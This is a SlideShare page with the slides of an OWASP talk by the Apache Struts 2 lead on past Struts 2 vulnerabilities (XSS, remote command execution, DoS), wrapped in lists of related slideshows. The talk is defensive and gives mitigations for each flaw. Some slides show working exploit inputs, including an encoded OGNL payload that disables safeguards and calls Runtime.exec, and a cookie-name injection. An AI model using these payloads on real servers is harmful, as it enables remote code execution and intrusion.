Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"

Pawel Krawczyk
Application Security Consultant
Mar. 13, 2013
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
1 of 24

Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"

Mar. 13, 2013
Download to read offline
Technology

Presented by Łukasz Lenart on OWASP Kraków meeting in February 2013.

Pawel Krawczyk
Application Security Consultant

Recommended

Learning Java 4 – Swing, SQL, and Security APILearning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APIcaswenson1.7K views22 slides
The practice of web application penetration testingThe practice of web application penetration testing
The practice of web application penetration testing_U2_406 views11 slides
Browser testing with nightwatch.js - Drupal EuropeBrowser testing with nightwatch.js - Drupal Europe
Browser testing with nightwatch.js - Drupal EuropeSalvador Molina (Slv_)116 views48 slides
Develop Maintainable AppsDevelop Maintainable Apps
Develop Maintainable AppsAnnyce Davis9.4K views113 slides
JDBC Basics (In 20 Minutes Flat)JDBC Basics (In 20 Minutes Flat)
JDBC Basics (In 20 Minutes Flat)Craig Dickson3.7K views18 slides
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri760 views87 slides

More Related Content

Slideshows for you

Hunting for malicious modules in npm - NodeSummitHunting for malicious modules in npm - NodeSummit
Hunting for malicious modules in npm - NodeSummitAdam Baldwin384 views45 slides
Secure coding in C#Secure coding in C#
Secure coding in C#Siddharth Bezalwar7K views32 slides
Tomcat连接池配置方法V2.1Tomcat连接池配置方法V2.1
Tomcat连接池配置方法V2.1Zianed Hou660 views8 slides
node.js errorsnode.js errors
node.js errorsLearningTech594 views15 slides
Web application SecurityWeb application Security
Web application SecurityLee C866 views43 slides
Structured Testing FrameworkStructured Testing Framework
Structured Testing Frameworkserzar223 views10 slides

Slideshows for you(10)

Hunting for malicious modules in npm - NodeSummitHunting for malicious modules in npm - NodeSummit
Hunting for malicious modules in npm - NodeSummit
Adam Baldwin384 views
Secure coding in C#Secure coding in C#
Secure coding in C#
Siddharth Bezalwar7K views
Tomcat连接池配置方法V2.1Tomcat连接池配置方法V2.1
Tomcat连接池配置方法V2.1
Zianed Hou660 views
node.js errorsnode.js errors
node.js errors
LearningTech594 views
Web application SecurityWeb application Security
Web application Security
Lee C866 views
Structured Testing FrameworkStructured Testing Framework
Structured Testing Framework
serzar223 views
Grails vs XSS: Defending Grails against XSS attacksGrails vs XSS: Defending Grails against XSS attacks
Grails vs XSS: Defending Grails against XSS attacks
theratpack2.5K views
XSS Countermeasures in GrailsXSS Countermeasures in Grails
XSS Countermeasures in Grails
theratpack3.2K views
Unit testing patterns for concurrent codeUnit testing patterns for concurrent code
Unit testing patterns for concurrent code
Dror Helper3K views
Thomas Fuchs PresentationThomas Fuchs Presentation
Thomas Fuchs Presentation
RubyOnRails_dude810 views

Viewers also liked

Maximizing your coaxial (cable tv) v2Maximizing your coaxial (cable tv) v2
Maximizing your coaxial (cable tv) v2Broto Santoso1.1K views12 slides
Securing Your .NET ApplicationSecuring Your .NET Application
Securing Your .NET ApplicationIron Speed515 views43 slides
Real Life Information SecurityReal Life Information Security
Real Life Information SecurityPawel Krawczyk533 views29 slides
RootedCON 2015 - Deep inside the Java framework Apache StrutsRootedCON 2015 - Deep inside the Java framework Apache Struts
RootedCON 2015 - Deep inside the Java framework Apache Strutstestpurposes6.3K views43 slides
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightHostway|HOSTING1.4K views13 slides
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamersjasonjfrank18.4K views42 slides

Viewers also liked(13)

Maximizing your coaxial (cable tv) v2Maximizing your coaxial (cable tv) v2
Maximizing your coaxial (cable tv) v2
Broto Santoso1.1K views
Securing Your .NET ApplicationSecuring Your .NET Application
Securing Your .NET Application
Iron Speed515 views
Real Life Information SecurityReal Life Information Security
Real Life Information Security
Pawel Krawczyk533 views
RootedCON 2015 - Deep inside the Java framework Apache StrutsRootedCON 2015 - Deep inside the Java framework Apache Struts
RootedCON 2015 - Deep inside the Java framework Apache Struts
testpurposes6.3K views
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with Phirelight
Hostway|HOSTING1.4K views
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
jasonjfrank18.4K views
.Net Hijacking to Defend PowerShell BSidesSF2017 .Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017
Amanda Rousseau6.4K views
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor NetworksQueue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
CSCJournals179 views
SETTING METHOD IN CONSIDERATION OF THE PCI/DSSSETTING METHOD IN CONSIDERATION OF THE PCI/DSS
SETTING METHOD IN CONSIDERATION OF THE PCI/DSS
hogehuga839 views
Passive infrastructure of FTTH networks: an overviewPassive infrastructure of FTTH networks: an overview
Passive infrastructure of FTTH networks: an overview
Luc De Heyn8.5K views
A very quick introduction to HFC, DOCSIS 3.0 and 3.1A very quick introduction to HFC, DOCSIS 3.0 and 3.1
A very quick introduction to HFC, DOCSIS 3.0 and 3.1
Erik Vloothuis4.4K views
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration Testers
Chris Gates51.9K views
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
Chris Gates4.6K views

Similar to Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"

How secure your web framework is?How secure your web framework is?
How secure your web framework is?SoftwareMill1K views34 slides
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd1.3K views55 slides
Strut2-Spring-HibernateStrut2-Spring-Hibernate
Strut2-Spring-HibernateJay Shah331 views36 slides
Java sciptJava scipt
Java sciptAshish Gajjar Samvad Cell416 views72 slides
Taming Deployment With Smart FrogTaming Deployment With Smart Frog
Taming Deployment With Smart FrogSteve Loughran687 views32 slides
Introduction to Struts 2Introduction to Struts 2
Introduction to Struts 2Collaboration Technologies160 views11 slides

Similar to Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"(20)

How secure your web framework is?How secure your web framework is?
How secure your web framework is?
SoftwareMill1K views
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
guest3379bd1.3K views
Strut2-Spring-HibernateStrut2-Spring-Hibernate
Strut2-Spring-Hibernate
Jay Shah331 views
Java sciptJava scipt
Java scipt
Ashish Gajjar Samvad Cell416 views
Taming Deployment With Smart FrogTaming Deployment With Smart Frog
Taming Deployment With Smart Frog
Steve Loughran687 views
Introduction to Struts 2Introduction to Struts 2
Introduction to Struts 2
Collaboration Technologies160 views
Python (Jinja2) Templates for Network AutomationPython (Jinja2) Templates for Network Automation
Python (Jinja2) Templates for Network Automation
Rick Sherman5.3K views
Struts 2 – InterceptorsStruts 2 – Interceptors
Struts 2 – Interceptors
Ducat India42 views
07 application security fundamentals - part 2 - security mechanisms - data ...07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...
appsec307 views
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
Association Paris-Web4.4K views
(Don't) Go Tracing Server Calls(Don't) Go Tracing Server Calls
(Don't) Go Tracing Server Calls
Brandon Hunter89 views
JSUG - Filthy Flex by Christoph PicklJSUG - Filthy Flex by Christoph Pickl
JSUG - Filthy Flex by Christoph Pickl
Christoph Pickl409 views
Struts2 notesStruts2 notes
Struts2 notes
Rajiv Gupta1.9K views
Struts2-Spring=HibernateStruts2-Spring=Hibernate
Struts2-Spring=Hibernate
Jay Shah780 views
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStorm
Shu Sugimoto3.3K views
Security on RailsSecurity on Rails
Security on Rails
David Paluy835 views
SF JUG - GWT Can Help You Create Amazing Apps - 2009-10-13SF JUG - GWT Can Help You Create Amazing Apps - 2009-10-13
SF JUG - GWT Can Help You Create Amazing Apps - 2009-10-13
Fred Sauer1.5K views
What the Struts?What the Struts?
What the Struts?
Joe Kutner408 views
Building an App with jQuery and JAXERBuilding an App with jQuery and JAXER
Building an App with jQuery and JAXER
Brian Moschel464 views
Java scriptJava script
Java script
Rajkiran Mummadi335 views

More from Pawel Krawczyk

Top DevOps Security FailuresTop DevOps Security Failures
Top DevOps Security FailuresPawel Krawczyk825 views52 slides
Authenticity and usabilityAuthenticity and usability
Authenticity and usabilityPawel Krawczyk65 views12 slides
Reading Geek Night 2019Reading Geek Night 2019
Reading Geek Night 2019Pawel Krawczyk602 views46 slides
Effective DevSecOpsEffective DevSecOps
Effective DevSecOpsPawel Krawczyk379 views55 slides
Unicode the hero or villain Unicode the hero or villain
Unicode the hero or villain Pawel Krawczyk443 views82 slides
Get rid of TLS certificates - using IPSec for large scale cloud protectionGet rid of TLS certificates - using IPSec for large scale cloud protection
Get rid of TLS certificates - using IPSec for large scale cloud protectionPawel Krawczyk124 views54 slides

More from Pawel Krawczyk(20)

Top DevOps Security FailuresTop DevOps Security Failures
Top DevOps Security Failures
Pawel Krawczyk825 views
Authenticity and usabilityAuthenticity and usability
Authenticity and usability
Pawel Krawczyk65 views
Reading Geek Night 2019Reading Geek Night 2019
Reading Geek Night 2019
Pawel Krawczyk602 views
Effective DevSecOpsEffective DevSecOps
Effective DevSecOps
Pawel Krawczyk379 views
Unicode the hero or villain Unicode the hero or villain
Unicode the hero or villain
Pawel Krawczyk443 views
Get rid of TLS certificates - using IPSec for large scale cloud protectionGet rid of TLS certificates - using IPSec for large scale cloud protection
Get rid of TLS certificates - using IPSec for large scale cloud protection
Pawel Krawczyk124 views
Presentation from CyberGov.pl 2015 Presentation from CyberGov.pl 2015
Presentation from CyberGov.pl 2015
Pawel Krawczyk824 views
Leszek Miś "Czy twoj WAF to potrafi"Leszek Miś "Czy twoj WAF to potrafi"
Leszek Miś "Czy twoj WAF to potrafi"
Pawel Krawczyk1.4K views
Paweł Krawczyk - Ekonomia bezpieczeństwaPaweł Krawczyk - Ekonomia bezpieczeństwa
Paweł Krawczyk - Ekonomia bezpieczeństwa
Pawel Krawczyk903 views
Are electronic signature assumptions realisticAre electronic signature assumptions realistic
Are electronic signature assumptions realistic
Pawel Krawczyk415 views
Dlaczego przejmować się bezpieczeństwem aplikacji (pol)Dlaczego przejmować się bezpieczeństwem aplikacji (pol)
Dlaczego przejmować się bezpieczeństwem aplikacji (pol)
Pawel Krawczyk656 views
Filtrowanie sieci - PanoptykonFiltrowanie sieci - Panoptykon
Filtrowanie sieci - Panoptykon
Pawel Krawczyk1.3K views
Pragmatic view on Electronic Signature directive 1999 93Pragmatic view on Electronic Signature directive 1999 93
Pragmatic view on Electronic Signature directive 1999 93
Pawel Krawczyk789 views
Why care about application securityWhy care about application security
Why care about application security
Pawel Krawczyk893 views
Source Code ScannersSource Code Scanners
Source Code Scanners
Pawel Krawczyk2.7K views
Krawczyk Ekonomia Bezpieczenstwa 2Krawczyk Ekonomia Bezpieczenstwa 2
Krawczyk Ekonomia Bezpieczenstwa 2
Pawel Krawczyk435 views
Audyt Wewnetrzny W Zakresie BezpieczenstwaAudyt Wewnetrzny W Zakresie Bezpieczenstwa
Audyt Wewnetrzny W Zakresie Bezpieczenstwa
Pawel Krawczyk2.3K views
Kryptografia i mechanizmy bezpieczenstwaKryptografia i mechanizmy bezpieczenstwa
Kryptografia i mechanizmy bezpieczenstwa
Pawel Krawczyk3.5K views
Zaufanie W Systemach InformatycznychZaufanie W Systemach Informatycznych
Zaufanie W Systemach Informatycznych
Pawel Krawczyk1.6K views
Europejskie Ramy Interoperacyjności 2.0Europejskie Ramy Interoperacyjności 2.0
Europejskie Ramy Interoperacyjności 2.0
Pawel Krawczyk506 views

Recently uploaded

GDSC23 SAC - Info Session GDSC.pptxGDSC23 SAC - Info Session GDSC.pptx
GDSC23 SAC - Info Session GDSC.pptxSAC221 views14 slides
AI and ML Series - Introduction to Generative AI and LLMs - Session 1AI and ML Series - Introduction to Generative AI and LLMs - Session 1
AI and ML Series - Introduction to Generative AI and LLMs - Session 1DianaGray10179 views38 slides
Info Session GDSC Mepco Sechenk Chapter.pptxInfo Session GDSC Mepco Sechenk Chapter.pptx
Info Session GDSC Mepco Sechenk Chapter.pptxDURAIVIGNESHC15 views13 slides
An Introduction To Using ChatGPT For BusinessAn Introduction To Using ChatGPT For Business
An Introduction To Using ChatGPT For BusinessPaul Nguyen56 views25 slides
Orbyfy Grid e-Services_vFx.pdfOrbyfy Grid e-Services_vFx.pdf
Orbyfy Grid e-Services_vFx.pdfOrbyfy19 views6 slides
zkStudyClub - Lasso/Jolt (Justin Thaler, GWU/a16z)zkStudyClub - Lasso/Jolt (Justin Thaler, GWU/a16z)
zkStudyClub - Lasso/Jolt (Justin Thaler, GWU/a16z)Alex Pruden17 views39 slides

Recently uploaded(20)

GDSC23 SAC - Info Session GDSC.pptxGDSC23 SAC - Info Session GDSC.pptx
GDSC23 SAC - Info Session GDSC.pptx
SAC221 views
AI and ML Series - Introduction to Generative AI and LLMs - Session 1AI and ML Series - Introduction to Generative AI and LLMs - Session 1
AI and ML Series - Introduction to Generative AI and LLMs - Session 1
DianaGray10179 views
Info Session GDSC Mepco Sechenk Chapter.pptxInfo Session GDSC Mepco Sechenk Chapter.pptx
Info Session GDSC Mepco Sechenk Chapter.pptx
DURAIVIGNESHC15 views
An Introduction To Using ChatGPT For BusinessAn Introduction To Using ChatGPT For Business
An Introduction To Using ChatGPT For Business
Paul Nguyen56 views
Orbyfy Grid e-Services_vFx.pdfOrbyfy Grid e-Services_vFx.pdf
Orbyfy Grid e-Services_vFx.pdf
Orbyfy19 views
zkStudyClub - Lasso/Jolt (Justin Thaler, GWU/a16z)zkStudyClub - Lasso/Jolt (Justin Thaler, GWU/a16z)
zkStudyClub - Lasso/Jolt (Justin Thaler, GWU/a16z)
Alex Pruden17 views
[KCD GT 2023] Demystifying etcd failure scenarios for Kubernetes.pdf[KCD GT 2023] Demystifying etcd failure scenarios for Kubernetes.pdf
[KCD GT 2023] Demystifying etcd failure scenarios for Kubernetes.pdf
William Caban45 views
DigitalWisers Onepager.pdfDigitalWisers Onepager.pdf
DigitalWisers Onepager.pdf
Mustafa Kuğu165 views
What's Coming in CloudStack 4.19What's Coming in CloudStack 4.19
What's Coming in CloudStack 4.19
ShapeBlue122 views
Carrom Pool Mod APK.docxCarrom Pool Mod APK.docx
Carrom Pool Mod APK.docx
RayJ1215 views
#11 DataWeave Extension Library using Visual Studio Code#11 DataWeave Extension Library using Visual Studio Code
#11 DataWeave Extension Library using Visual Studio Code
AnoopRamachandran1379 views
What’s new in Kotlin 12-08-2023 Google IO Cairo 23What’s new in Kotlin 12-08-2023 Google IO Cairo 23
What’s new in Kotlin 12-08-2023 Google IO Cairo 23
Ahmed Nabil66 views
Testing and Developing GraphQL APIsTesting and Developing GraphQL APIs
Testing and Developing GraphQL APIs
Postman21 views
OpenFOAM benchmark for EPYC server -Influence of coarsestLevelCorr in GAMG so...OpenFOAM benchmark for EPYC server -Influence of coarsestLevelCorr in GAMG so...
OpenFOAM benchmark for EPYC server -Influence of coarsestLevelCorr in GAMG so...
takuyayamamoto180014 views
Asterisk UpdateAsterisk Update
Asterisk Update
OpenDireito15 views
dvss.pptdvss.ppt
dvss.ppt
SaikrishnaCheruvu1354 views
Artificial Intelligence (AI).pptxArtificial Intelligence (AI).pptx
Artificial Intelligence (AI).pptx
SharifulShishir49 views
Graph Neural Networks.pptxGraph Neural Networks.pptx
Graph Neural Networks.pptx
Kumar Iyer19 views
NoSQL Database Migration Masterclass - Session 3: Migration LogisticsNoSQL Database Migration Masterclass - Session 3: Migration Logistics
NoSQL Database Migration Masterclass - Session 3: Migration Logistics
ScyllaDB27 views
Common - Concerns Around OpenAI.pptxCommon - Concerns Around OpenAI.pptx
Common - Concerns Around OpenAI.pptx
Alok Ranjan51 views

Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"

  1. “…  use  the  source  …”   Based  on  Apache  Struts  2  

  2. ¡  About  me   ¡  What  is  the  Apache  Struts  2   ¡  Hacking  the  framework   §  S2-­‐006  aka  Client  side  code  injection   §  S2-­‐008  aka  Remote  Command  Execution   §  S2-­‐009  aka  RCE  strikes  back   §  S2-­‐011  aka  DoS   §  Sx-­‐xxx  aka  vulnerability  or  not  

  3. ¡  Apache  Struts  2  Lead   ¡  Member  of  Apache  Software  Foundation   ¡  Creative  Software  Engineer  @  SoftwareMill   ¡  Blogger   ¡  IntelliJ  IDEA  addict  J   ¡  JetBrains  Development  Academy  Member   ¡  @lukaszlenart   ¡  Husband,  father  J  

  4. ¡  Struts  2  is  a  new  kid  on  the  block   §  No  single  line  shared  with  Struts  1   §  No  form  beans,  no  session-­‐scoped  actions   §  Pure  POJOs,  Interface  steering   §  Strongly  interceptor  oriented   §  Highly  extendable  –  lots  of  plugins   §  Designed  to  be  customizable   §  Powerful  OGNL  expression  language  

  5. #ognl   %{…}   ${…}  

  6. struts.xml   index.jsp   IndexAction.properties  

  7. ¡  When  Dynamic  Method  Invocation  is  enabled   action  name  is  generated  base  on  the   provided  request   ¡  Non-­‐existing  action  will  generate  an  error   page  with  injected  client  code   §  Issue  is  specific  to  Weblogic  server   ¡  http://struts.apache.org/2.x/docs/s2-­‐006.html  

  8. ¡  /HelloWorld.action?action%3Alogin!login %3AcantLogin%3Cscript%3Ealert %28window.location%29%3C%2Fscript%3E %3Dsome_value=Submit  

  9. ¡  Disable  DMI   §  <constant   name="struts.enable.DynamicMethodInvocation"   value="false"  />   ¡  Upgrade  to  Struts  2.2.3   ¡  Don’t  use  Weblogic  ;-­‐)  

  10. ¡  Conversion  error  is  evaluated  as  expression   ¡  Cookie  name  is  evaluated  as  expression   ¡  With  “!”  (bang)  you  can  access  any  public   method  of  action   §  Only  when  Dynamic  Method  Invocation  is  set  to   true,  is  set  to  true  by  default       ¡  http://struts.apache.org/2.x/docs/s2-­‐008.html    

  11. ¡  /hello.action?id='%2b(new  Object())%2b’   ¡  Cookie:   @java.lang.Runtime@getRuntime().exec()=1   ¡  /mywebapp/recover!getPassword.action  

  12. ¡  Disable  DMI   §  <constant   name="struts.enable.DynamicMethodInvocation"   value="false"  />   ¡  Review  your  action  public  methods   ¡  Use  Strict  DMI  –  list  of  allowed  methods   ¡  DMI  disabled  by  default  as  from  Struts  2.3.1   ¡  Upgrade  to  Struts  2.3.1!  

  13. ¡  An  arbitrary  code  can  be  executed  on  server   §  Encoded  value  of  parameter  is  parsed  as  an  OGNL   expression   ¡  http://struts.apache.org/2.x/docs/s2-­‐009.html  

  14. ¡  /action?foo= %28%23context[%22xwork.MethodAccessor.deny MethodExecution%22]%3D+new +java.lang.Boolean%28false %29,%20%23_memberAccess[%22allowStaticMeth odAccess%22]%3d+new+java.lang.Boolean%28true %29,%20@java.lang.Runtime@getRuntime %28%29.exec%28%27mkdir%20/tmp/PWNAGE %27%29%29%28meh%29&z[%28foo %29%28%27meh%27%29]=true  

  15. ¡  Stronger  pattern  for  parameter  names   §  OGNL  only  sets  value,  does  not  evaluate  it   ¡  Workaround   §  add  a  filter  to  filter  out  all  the  suspicious  looking   parameters/headers   ¡  Upgrade  to  Struts  2.3.1.2  

  16. ¡  Denial  of  Service   §  Long  request  parameter  name  is  evaluated  by   OGNL  and  consumes  significant  CPU  cycle   ¡  http://struts.apache.org/2.x/docs/s2-­‐011.html  

  17. ¡  POST  /home   veryveryveryevenveryveryveryveryveryveryv eryveryevenevenveryveryveryveryloooooooo ooooooongpramaterename=1   §  300  request   §  parameter  name  length  =  1000000  

  18. ¡  Add  parameter  name  length  limit   §  By  default  100  characters   §  User  can  change  the  limit     ¡  Workaround   §  add  a  filter  to  filter  out  all  the  parameters  longer   than  xxx   ¡  Upgrade  to  Struts  2.3.4.1  

  19. ¡  Struts  2  allows  nested  OGNL  expressions   §  #  {%{java.lang.System@out.println(“hello”)}}   §  Users  do  not  escape  data   ¡  Example  –  please  judge  

  20. ¡  Check  how  vulnerable  your  current  web   framework  is   ¡  Find  a  security  vulnerability,  try  to  inject   JavaScript   §  Report  back  to  the  project  team  

  21.     This  is  the  end,  questions?   @lukaszlenart   lukaszlenart@apache.org